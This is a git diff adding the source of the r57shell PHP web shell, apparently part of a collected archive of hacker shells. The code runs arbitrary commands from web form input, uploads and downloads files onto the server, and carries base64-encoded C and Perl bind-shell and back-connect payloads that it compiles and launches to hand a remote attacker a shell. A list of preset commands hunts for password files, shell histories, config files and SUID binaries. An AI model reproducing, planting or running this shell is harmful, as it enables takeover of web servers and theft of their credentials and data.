+echo $te."</td>".$fe."</tr></table>";
+}
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/r57shell.php.php.txt b/xakep-shells/PHP/r57shell.php.php.txt
new file mode 100644
index 0000000..be948f2
--- /dev/null
+++ b/xakep-shells/PHP/r57shell.php.php.txt
@@ -0,0 +1,640 @@
+<?
+/******************************************************************************************************/
+/*
+/*                                 __________               ___ ___
+/*                                 \______   \__ __  ______/   |   \
+/*                                  |       _/  |  \/  ___/    _    \
+/*                                  |    |   \  |  /\___ \\         /
+/*                                  |____|_  /____//____  >\___|_  /
+/*                                  -======\/==security=\/=team==\/
+/*
+/*
+/*
+/*  r57shell.php - ������ �� ��� ����������� ��� ��������� ���� �������  �� ������� ����� �������
+/*  �� ������ ������� ����� ������ �� ����� �����: http://rst.void.ru
+/*  ������: 1.1 �� 14.10.2004 (public 31.12.2004. Happy new year!!!)
+/*
+/*  �����������:
+/*  ~ ������ ������� � ������� ������
+/*  ~ ���������� ����-������
+/*  ~ �������� ������ �� ������
+/*  ~ �������� ������ � ���������� ������� � ������� wget, fetch ��� lynx
+/*  ~ ������������ ������ ������
+/*  ~ �������� ������ ������:
+/*    - ����� �� ������� ���� ������ � suid �����
+/*    - ����� �� ������� ���� ������ � sgid �����
+/*    - ����� �� ������� ������ config.inc.php
+/*    - ����� �� ������� ���� ���������� � ������ ��������� �� ������ ��� ����
+/*    - ����� �� ������� ������ service.pwd
+/*    - ����� �� ������� ������ .htpasswd
+/*    - ����� �� ������� ������ .bash_history
+/*    - ����� �� ������� ������ config*
+/*    - ����� �� ������� ������ .fetchmailrc
+/*    - ����� ������ ��������� ������ �� �������� ������� ext2fs
+/*  ~ ��� ������� ������ �������� ��� ����� ������� � ����� ��� � ����� ������ � ������� ����������
+/*  ~ ��� ����� ����������: �������, ����������
+/*  ~ ����������� ��������� /bin/bash �� ������������ ���� � ������� Perl ��� � ����
+/*  ~ ����������� ������ back-connect � ������� Perl ��� � ����
+/*  ~ ����� �������� $OSTYPE � sysctl
+/*
+/*  ������� �� ������ 1.0c:
+/*  - ��������� ������� back-connect � ������� ���� �� Perl
+/*  - ��������� ������� back-connect � ������� ���� �� C
+/*  - ��������� ������� bind � ������� ���� �� Perl
+/*  - ������� ������������� ��� ������ ����������� html � ����������
+/*  - � ������ ��������� ����� �������
+/*  - �������� ����� sysctl
+/*  - �������� ����� ���������� $OSTYPE
+/*  - ��������� ����������� �������� ������ � ���������� ������� � �������������� wget, fetch ��� lynx
+/*
+/*  ������� �� ������ 1.0 beta:
+/*  - ��������� ������ ������� � ������� �������� �����.
+/*
+/*  14.10.2004 (c) RusH security team
+/*
+/******************************************************************************************************/
+
+// ��������������
+
+// ����� � ������ ��� ������� � �������
+// �� �������� ������� ����� ����������� �� �������!!!
+/*
+$name="djskel"; // ����� ������������
+$pass="XYFifA"; // ������ ������������
+
+if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)
+   {
+   header("WWW-Authenticate: Basic realm=\"r57shell\"");
+   header("HTTP/1.0 401 Unauthorized");
+   exit("Access Denied");
+   }
+*/
+error_reporting(0);
+set_time_limit(0);
+set_magic_quotes_runtime(0);
+$err=0;
+
+/*
+����� �����
+$language='ru' - �������
+$language='eng' - ����������
+*/
+$language='ru';
+
+$lang=array(
+           'ru_text1'  => '����������� �������',
+           'ru_text2'  => '���������� ������ �� �������',
+           'ru_text3'  => '��������� �������',
+           'ru_text4'  => '������� ����������',
+           'ru_text5'  => '�������� ������ �� ������',
+           'ru_text6'  => '��������� ����',
+           'ru_text7'  => '������',
+           'ru_text8'  => '�������� �����',
+           'ru_butt1'  => '���������',
+           'ru_butt2'  => '���������',
+           'ru_text9'  => '�������� ����� � �������� ��� � /bin/bash',
+           'ru_text10' => '������� ����',
+           'ru_text11' => '������ ��� �������',
+           'ru_butt3'  => '�������',
+           'ru_text12' => 'back-connect',
+           'ru_text13' => 'IP-�����',
+           'ru_text14' => '����',
+           'ru_butt4'  => '���������',
+           'ru_text15' => '�������� ������ � ���������� �������',
+           'ru_text16' => '������������',
+           'ru_text17' => '��������� ����',
+           'ru_text18' => '��������� ����',
+           'ru_text19' => 'Exploits',
+           'ru_text20' => '������������',
+           
+           'eng_text1'  => 'Executed command',
+           'eng_text2'  => 'Execute command on server',
+           'eng_text3'  => '&nbsp;Run command',
+           'eng_text4'  => 'Work directory',
+           'eng_text5'  => 'Upload files on server',
+           'eng_text6'  => 'Local file',
+           'eng_text7'  => 'Aliases',
+           'eng_text8'  => 'Select alias',
+           'eng_butt1'  => 'Execute',
+           'eng_butt2'  => 'Upload',
+           'eng_text9'  => 'Bind port to /bin/bash',
+           'eng_text10' => 'Port',
+           'eng_text11' => 'Password for access',
+           'eng_butt3'  => 'Bind',
+           'eng_text12' => 'back-connect',
+           'eng_text13' => 'IP',
+           'eng_text14' => 'Port',
+           'eng_butt4'  => 'Connect',
+           'eng_text15' => 'Upload files from remote server',
+           'eng_text16' => '       With',
+           'eng_text17' => '  Remote file',
+           'eng_text18' => '   Local file',
+           'eng_text19' => 'Exploits',
+           'eng_text20' => '         Use',
+           );
+
+
+
+/*
+������ ������
+��������� �������� ������������� ������ ����� � ���-�� ������. ( ������� ��������� ���� ��������� ���� )
+�� ������ ���� ��������� ��� �������� �������.
+*/
+
+$aliases=array(
+
+/* ����� �� ������� ���� ������ � suid ����� */
+'find all suid files' => 'find / -type f -perm -04000 -ls',
+
+/* ����� � ������� ���������� ���� ������ � suid ����� */
+'find suid files in current dir' => 'find . -type f -perm -04000 -ls',
+
+/* ����� �� ������� ���� ������ � sgid ����� */
+'find all sgid files' => 'find / -type f -perm -02000 -ls',
+
+/* ����� � ������� ���������� ���� ������ � sgid ����� */
+'find sgid files in current dir' => 'find . -type f -perm -02000 -ls',
+
+/* ����� �� ������� ������ config.inc.php */
+'find config.inc.php files' => 'find / -type f -name config.inc.php',
+
+/* ����� �� ������� ������ config* */
+'find config* files' => 'find / -type f -name "config*"',
+
+/* ����� � ������� ���������� ������ config* */
+'find config* files in current dir' => 'find . -type f -name "config*"',
+
+/* ����� �� ������� ���� ���������� � ������ ��������� �� ������ ��� ���� */
+'find all writable directories and files' => 'find / -perm -2 -ls',
+
+/* ����� � ������� ���������� ���� ���������� � ������ ��������� �� ������ ��� ���� */
+'find all writable directories and files in current dir' => 'find . -perm -2 -ls',
+
+/* ����� �� ������� ������ service.pwd ... frontpage =))) */
+'find all service.pwd files' => 'find / -type f -name service.pwd',
+
+/* ����� � ������� ���������� ������ service.pwd */
+'find service.pwd files in current dir' => 'find . -type f -name service.pwd',
+
+/* ����� �� ������� ������ .htpasswd */
+'find all .htpasswd files' => 'find / -type f -name .htpasswd',
+
+/* ����� � ������� ���������� ������ .htpasswd */
+'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd',
+
+/* ����� ���� ������ .bash_history */
+'find all .bash_history files' => 'find / -type f -name .bash_history',
+
+/* ����� � ������� ���������� ������ .bash_history */
+'find .bash_history files in current dir' => 'find . -type f -name .bash_history',
+
+/* ����� ���� ������ .fetchmailrc */
+'find all .fetchmailrc files' => 'find / -type f -name .fetchmailrc',
+
+/* ����� � ������� ���������� ������ .fetchmailrc */
+'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc',
+
+/* ����� ������ ��������� ������ �� �������� ������� ext2fs */
+'list file attributes on a Linux second extended file system' => 'lsattr -va',
+
+/* �������� �������� ������ */
+'show opened ports' => 'netstat -an | grep -i listen',
+
+'----------------------------------------------------------------------------------------------------' => 'ls -la'
+);
+
+/* html */
+
+$table_up1 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2 = " ::</div></b></font></td></tr><tr><td>";
+$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr></table>";
+
+/* -------------------------- Port bind source C ------------------------ */
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5
+jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5
+ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5
+0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV
+mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0
+KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh
+hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F
+OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N
+rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F
+kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB
+7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV
+wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ
+6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh
+hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J
+pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN
+sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5
+0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih
+lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0
+9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk
+pDQpyZXR1cm4gMDsNCn0=";
+/* -------------------------- END Port bind source C -------------------- */
+
+/* -------------------------- Port bind perl source --------------------- */
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi
+AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2
+NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV
+QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ
+pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH
+JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw
+0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm
+FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW
+YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk
+NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0
+9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9";
+/* -------------------------- END Port bind perl source ----------------- */
+
+/* -------------------------- back connect Perl source ------------------ */
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ
+HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ
+DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ
+HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L
+CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd
+GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka
+WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO
+iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR
+VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK
+FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+/* -------------------------- END back connect Perl source -------------- */
+
+/* -------------------------- back connect C source --------------------- */
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0
+KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10
+pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ
+ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l
+uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA
+9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt
+zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB
+QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4
+sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg
+pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1
+zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN
+sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+/* -------------------------- END back connect C source ----------------- */
+?>
+
+<!-- ����������  ���� -->
+<html>
+<head>
+<title>r57shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+
+</head>
+<body bgcolor="#e4e0d8">
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc>
+<!-- logo -->
+<font face=Verdana size=2>&nbsp;&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>&nbsp;&nbsp;r57shell</b>
+</font>
+</td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>
+
+<?
+
+/* change dir */
+if (!empty($HTTP_POST_VARS['dir'])) { chdir($HTTP_POST_VARS['dir']); }
+$dir = getcwd();
+
+/* display information */
+echo "<font face=Verdana size=-2>";
+echo '<font color=blue><b>uname -a :&nbsp;<br>sysctl :&nbsp;<br>$OSTYPE :&nbsp;<br>id :&nbsp;<br>pwd :&nbsp;</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo "&nbsp;&nbsp;&nbsp; ".exec("uname -a")."<br>";
+$bsd1 = `/sbin/sysctl -n kern.ostype`;
+$bsd2 = `/sbin/sysctl -n kern.osrelease`;
+$lin1 = `/sbin/sysctl -n kernel.ostype`;
+$lin2 = `/sbin/sysctl -n kernel.osrelease`;
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo "&nbsp;&nbsp;&nbsp; ".$sysctl."<br>";
+echo "&nbsp;&nbsp;&nbsp; ".exec('echo $OSTYPE')."<br>";
+echo "&nbsp;&nbsp;&nbsp; ".exec("id")."<br>";
+echo "&nbsp;&nbsp;&nbsp; ".$dir;
+echo "</b></font>";
+echo "</font>";
+echo $table_end1;
+
+/* port bind C */
+if (!empty($HTTP_POST_VARS['port'])&&!empty($HTTP_POST_VARS['bind_pass'])&&($HTTP_POST_VARS['use']=="C"))
+{
+ $w_file=fopen("/tmp/bd.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/bd.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/bd /tmp/bd.c");
+ unlink("/tmp/bd.c");
+ $bind_string="/tmp/bd ".$HTTP_POST_VARS['port']." ".$HTTP_POST_VARS['bind_pass']." &";
+ $blah=exec($bind_string);
+ $HTTP_POST_VARS['cmd']="ps -aux | grep bd";
+ $err=0;
+ }
+}
+
+/* port bind Perl */
+if (!empty($HTTP_POST_VARS['port'])&&!empty($HTTP_POST_VARS['bind_pass'])&&($HTTP_POST_VARS['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/bdpl","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/bdpl</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_pl));
+ fclose($w_file);
+ $bind_string="perl /tmp/bdpl ".$HTTP_POST_VARS['port']." &";
+ $blah=exec($bind_string);
+ $HTTP_POST_VARS['cmd']="ps -aux | grep bdpl";
+ $err=0;
+ }
+}
+
+/* back connect Perl */
+if (!empty($HTTP_POST_VARS['ip']) && !empty($HTTP_POST_VARS['port']) && ($HTTP_POST_VARS['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/back","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/back</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect));
+ fclose($w_file);
+ $bc_string="perl /tmp/back ".$HTTP_POST_VARS['ip']." ".$HTTP_POST_VARS['port']." &";
+ $blah=exec($bc_string);
+ $HTTP_POST_VARS['cmd']="echo \"Now script try connect to ".$HTTP_POST_VARS['ip']." port ".$HTTP_POST_VARS['port']." ...\"";
+ $err=0;
+ }
+}
+
+/* back connect C */
+if (!empty($HTTP_POST_VARS['ip']) && !empty($HTTP_POST_VARS['port']) && ($HTTP_POST_VARS['use']=="C"))
+{
+ $w_file=fopen("/tmp/back.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/back.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/backc /tmp/back.c");
+ unlink("/tmp/back.c");
+ $bc_string="/tmp/backc ".$HTTP_POST_VARS['ip']." ".$HTTP_POST_VARS['port']." &";
+ $blah=exec($bc_string);
+ $HTTP_POST_VARS['cmd']="echo \"Now script try connect to ".$HTTP_POST_VARS['ip']." port ".$HTTP_POST_VARS['port']." ...\"";
+ $err=0;
+ }
+}
+
+/* alias execute */
+if (!empty($HTTP_POST_VARS['alias']))
+ {
+ foreach ($aliases as $alias_name=>$alias_cmd) {
+                                               if ($HTTP_POST_VARS['alias'] == $alias_name) {$HTTP_POST_VARS['cmd']=$alias_cmd;}
+                                               }
+ }
+
+/* file upload */
+if (!empty($HTTP_POST_FILES["userfile"]))
+{
+copy($HTTP_POST_FILES["userfile"][tmp_name],
+            $HTTP_POST_VARS['dir']."/".$HTTP_POST_FILES["userfile"][name])
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES["userfile"][name]."</div></font>");
+}
+
+
+/* file upload from remote host */
+if (!empty($HTTP_POST_VARS['with']) && !empty($HTTP_POST_VARS['rem_file']) && !empty($HTTP_POST_VARS['loc_file']))
+{
+ if ($HTTP_POST_VARS['with'] == "wget") { $HTTP_POST_VARS['cmd'] = "wget ".$HTTP_POST_VARS['rem_file']." -O ".$HTTP_POST_VARS['loc_file'].""; }
+ else if ($HTTP_POST_VARS['with'] == "fetch") { $HTTP_POST_VARS['cmd']= "fetch -p ".$HTTP_POST_VARS['rem_file']." -o ".$HTTP_POST_VARS['loc_file'].""; }
+ else if ($HTTP_POST_VARS['with'] == "lynx") { $HTTP_POST_VARS['cmd']= "lynx -source ".$HTTP_POST_VARS['rem_file']." > ".$HTTP_POST_VARS['loc_file'].""; }
+}
+
+/* command execute */
+echo $table_up3;
+if ((!$HTTP_POST_VARS['cmd']) || ($HTTP_POST_VARS['cmd']=="")) { $HTTP_POST_VARS['cmd']="ls -lia"; }
+echo "<font face=Verdana size=-2>".$lang[$language._text1].": <b>".$HTTP_POST_VARS['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<div align=center><textarea name=report cols=121 rows=15>";
+echo "".passthru($HTTP_POST_VARS['cmd'])."";
+echo "</textarea></div>";
+echo "</b>";
+echo $table_end1;
+
+/* command execute form */
+echo $table_up1; echo $lang[$language._text2]; echo $table_up2;
+echo "<form name=command method=post>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;".$lang[$language._text3]." <font face=Wingdings color=gray>�</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=text name=cmd size=85>&nbsp;&nbsp;<br>";
+echo "<b>&nbsp;".$lang[$language._text4]." <font face=Wingdings color=gray>�</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=text name=dir size=85 value=".$dir.">";
+echo "&nbsp;<input type=submit name=submit value=\" ".$lang[$language._butt1]." \">";
+echo "</font>";
+echo "</form>";
+echo $table_end1;
+
+/* aliases form */
+echo $table_up1; echo $lang[$language._text7]; echo $table_up2;
+echo "<form name=aliases method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text8]." <font face=Wingdings color=gray>�</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<select name=alias>";
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ echo "<option>$alias_name</option>";
+ }
+ echo "</select>";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "&nbsp;<input type=submit name=submit value=\" ".$lang[$language._butt1]." \">";
+echo "</font>";
+echo "</form>";
+echo $table_end1;
+
+/* file upload form */
+echo $table_up1; echo $lang[$language._text5]; echo $table_up2;
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text6]." <font face=Wingdings color=gray>�</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=file name=userfile size=85>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=\" ".$lang[$language._butt2]." \">";
+echo "</font>";
+echo "</form>";
+echo $table_end1;
+
+/* file upload from remote host form */
+echo $table_up1; echo $lang[$language._text15]; echo $table_up2;
+echo "<form name=remote_upload method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text16]." <font face=Wingdings color=gray>�</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<select size=\"1\" name=\"with\">";
+echo "<option value=\"wget\">wget</option>";
+echo "<option value=\"fetch\">fetch</option>";
+echo "<option value=\"lynx\">lynx</option>";
+echo "</select>&nbsp;<br>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text17]." <font face=Wingdings color=gray>�</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=text name=rem_file value=http:// size=85>&nbsp;&nbsp;<br>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text18]." <font face=Wingdings color=gray>�</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=text name=loc_file size=85 value=".$dir.">&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=\" ".$lang[$language._butt2]." \">";
+echo "</font>";
+echo "</form>";
+echo $table_end1;
+
+/* port bind form */
+echo $table_up1; echo $lang[$language._text9]; echo $table_up2;
+echo "<form name=bind method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text10]." <font face=Wingdings color=gray>�</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=text name=port size=15 value=11457>&nbsp;";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text11]." <font face=Wingdings color=gray>�</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=text name=bind_pass size=15 value=r57>&nbsp;";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text20]." <font face=Wingdings color=gray>�</font>&nbsp;</b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
